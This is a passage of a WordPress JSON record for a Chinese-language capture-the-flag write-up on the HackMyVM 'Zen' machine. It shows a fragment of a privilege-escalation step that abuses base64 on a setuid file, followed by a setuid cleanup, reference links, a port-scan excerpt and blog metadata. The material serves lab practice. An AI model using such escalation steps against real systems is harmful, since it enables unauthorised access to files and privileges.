\/tmp\/test\nhua@zen:\/usr\/local\/bin$ base64 rm | base64 -d\nchmod -s \/tmp\/test<\/code><\/pre>\n
\"image-20240904003138670\"<\/div><\/p>\n
\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV1HZ421U7xf<\/a><\/p>\n
https:\/\/grumpygeekwrites.wordpress.com\/2021\/06\/15\/hackmyvm-zen-walk-through-tutorial-writeup\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Zen \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Zen] \u2514\u2500$ rustscan  […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-791","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/791","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=791"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/791\/revisions"}],"predecessor-version":[{"id":792,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/791\/revisions\/792"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=791"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}